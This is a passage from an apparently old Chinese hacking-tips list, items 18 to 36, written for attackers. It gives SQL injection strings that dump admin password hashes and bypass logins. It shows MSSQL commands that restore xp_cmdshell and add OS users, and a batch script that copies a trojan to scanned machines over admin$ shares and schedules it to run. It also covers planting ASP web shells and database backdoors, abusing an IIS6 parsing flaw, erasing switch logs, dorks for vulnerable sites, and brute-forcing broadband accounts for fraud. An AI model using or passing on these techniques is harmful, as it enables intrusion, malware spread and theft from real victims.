18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉

　　不能注入时要第一时间想到%5c暴库

　　19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽，几乎发现不了

　　工具使用方法动画和所有文件

　　http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811

　　20.缺少xp_cmdshell时

　　尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

　　假如恢复不成功,可以尝试直接加用户(针对开3389的)

　　declare @o int

　　exec sp_oacreate 'wscript.shell',@o out

　　exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理员

21.批量种植木马.bat

　　for /f %%i in (扫描地址.txt) do copy pc.exe %%iadmin$ 复制木马到扫描的计算机当中

　　for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间

　　扫描地址.txt里每个主机名一行 用开头

　　22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址www.hack6.com

　　23.dv7.1用还原数据功能 还原asa木马

　　24.凡人网络购物系统v6.0 可以%5c暴库

　　25.ipb2.0.2漏洞 构造语句

　　$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb<= 2.0.3论坛注入工具 www.hack6.com有下载

　　26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间

　　27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲

　　28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马

　　29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路

　　30.在程序上传shell过程中，程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下： 保存为.asp,程序照样 执行.

　　31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马

　　32.喜欢网页挂马的看看这篇总结文章吧

　　http://77169.com/news/hk/2005060611656.html

　　33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库

　　34.iis6 for windows 2003 enterprise edition 如iis发布目录文件夹包含.asp后辍名.

　　将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.

　　.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

　　35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip

　　然后用#clear logg和#clear line vty *删除日志

　　36.搜索关键字:"copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多